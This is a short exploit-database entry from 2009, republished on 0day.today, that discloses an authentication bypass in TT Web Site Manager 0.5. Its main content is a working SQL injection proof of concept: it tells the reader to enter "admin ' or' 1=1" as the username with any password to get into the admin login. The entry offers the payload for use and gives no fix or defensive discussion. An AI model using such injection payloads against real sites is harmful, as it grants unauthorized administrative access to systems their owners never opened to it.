id: 5597
date: 08/02/2009
title: TT Web Site Manager 0.5 (Auth Bypass) SQL Injection Vulnerability
author: SirGod
cves: 

=================================================================
TT Web Site Manager 0.5 (Auth Bypass) SQL Injection Vulnerability
=================================================================


#########################################################################
[+] TT Web Site Manager 0.5 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
#########################################################################

[+] Homepage  : http://www.technotoad.com/

[+] Auth Bypass

 - Go to

     http://127.0.0.1/tt/

 - PoC

     Username : admin ' or' 1=1
     Password : anything

#########################################################################



#  0day.today [2023-03-23]  #